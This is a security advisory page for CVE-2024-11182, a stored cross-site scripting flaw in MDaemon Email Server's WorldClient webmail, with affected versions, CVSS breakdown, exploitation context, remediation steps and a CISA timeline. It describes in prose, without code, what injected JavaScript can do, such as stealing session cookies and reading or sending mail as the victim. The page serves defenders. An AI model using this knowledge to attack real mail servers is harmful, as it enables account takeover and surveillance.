Search
On this page ▾
CVE-2024-11182 — MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability

CVE-2024-11182

MDaemon Email Server WorldClient — Stored XSS via Malicious HTML Email Executes Arbitrary JavaScript in Victim's Browser
⚠️ CVSS 3.1  6.1 / 10 — MEDIUM 🔴 CISA Known Exploited Vulnerability

What is MDaemon Email Server?

MDaemon Email Server is a Windows-based email server widely used by small and medium-sized businesses and government organizations, particularly in Eastern Europe and government sectors. MDaemon's WorldClient is its webmail interface, allowing users to read, compose, and manage email through a web browser. MDaemon is particularly prevalent in government, defense, and critical infrastructure organizations in Europe and Central Asia. Because email servers process all organizational communications and often store sensitive correspondence, a compromise via email server vulnerabilities provides an attacker with persistent, broad access to organizational communications.

Overview

CVE-2024-11182 is a cross-site scripting (XSS) vulnerability in MDaemon Email Server's WorldClient webmail interface that allows a remote attacker to execute arbitrary JavaScript in a victim's browser by sending a malicious HTML email. The Scope Changed (S:C) rating reflects that the script executes in the browser context of the email server's domain — potentially accessing authentication cookies, session tokens, and CSRF tokens needed to act on the victim's behalf. The vulnerability was patched in MDaemon 24.5.1; CISA added it to the KEV catalog in May 2025, six months after the patch, indicating targeted exploitation against government and defense organizations.

Affected Versions

Product Vulnerable Fixed
MDaemon Email Server < 24.5.1 24.5.1

Technical Details

CWE-79 (Cross-Site Scripting). MDaemon's WorldClient webmail processes incoming HTML email content for display in a web browser. A flaw in the HTML sanitization logic fails to adequately filter or escape certain JavaScript-bearing HTML constructs embedded in email messages. When a victim opens a crafted HTML email in WorldClient, the malicious JavaScript executes in the victim's browser in the origin context of the MDaemon WebClient domain.

Executing JavaScript in the webmail origin enables an attacker to: read the victim's session cookies and authentication tokens (for account takeover without requiring the victim's password), exfiltrate email contents programmatically, send emails as the victim, access MDaemon's webmail API on the victim's behalf, and potentially pivot to phishing attacks using the victim's trusted identity.

The Scope Changed (S:C) in the CVSS vector reflects that the malicious script executes not in the attacker's context but in the victim's browser context bound to the email server's domain — crossing the origin boundary from the attacker-controlled email into the server's authenticated web application context.

Discovery

Identified and reported to MDaemon by security researchers. The six-month delay between the patch and CISA KEV addition (November 2024 to May 2025) reflects exploitation being observed in targeted campaigns against government and defense organizations — consistent with APT operations that use email server XSS to conduct low-noise persistent surveillance rather than immediately obvious data theft.

Exploitation Context

MDaemon's prevalence in Eastern European government organizations makes it a target for Russian-nexus APT groups (APT28, Turla, Sandworm) that routinely target government email infrastructure in Ukraine and neighboring states. A stored XSS in a widely-used government webmail system enables persistent collection of internal communications with minimal footprint — the attacker sends a specially crafted email and any official who reads it via WorldClient executes the payload.

Remediation

  1. Upgrade MDaemon Email Server to version 24.5.1 or later immediately — apply the update from the MDaemon downloads page.
  2. Review MDaemon access logs for unusual API calls, session anomalies, or unexpected email access patterns dating back to late 2024.
  3. Enforce HTTPS for all WorldClient connections and configure HTTP Strict Transport Security (HSTS) to prevent cookie theft via downgrade attacks.
  4. Configure MDaemon's HTML email sanitization settings to the most restrictive mode — consider converting all incoming HTML email to plain text for users who do not require HTML email rendering.
  5. Enable MDaemon's built-in spam and content filtering to block emails with suspicious HTML constructs at the mail gateway level.

Key Details

PropertyValue
CVE ID CVE-2024-11182
Vendor / Product MDaemon — Email Server
NVD Published2024-11-15
NVD Last Modified2025-10-30
CVSS 3.1 Score6.1
CVSS 3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
SeverityMEDIUM
CWE CWE-79 find similar ↗
CISA KEV Added2025-05-19
CISA KEV Deadline2025-06-09
Known Ransomware Use No

CVSS 3.1 Breakdown

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Required Action

CISA BOD 22-01 Deadline: 2025-06-09. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

DateEvent
2024-11-14MDaemon releases version 24.5.1 patching CVE-2024-11182
2024-11-15CVE published
2025-05-19Added to CISA Known Exploited Vulnerabilities catalog — 6 months after patch
2025-06-09CISA BOD 22-01 remediation deadline

References

ResourceType
MDaemon Critical Updates — CVE-2024-11182 Vendor Advisory
NVD — CVE-2024-11182 Vulnerability Database
CISA KEV Catalog Entry US Government

Last updated: 2026-05-20

Suggest an update ↗

Gavin Hollinger & AI assembled this air-gap friendly HTML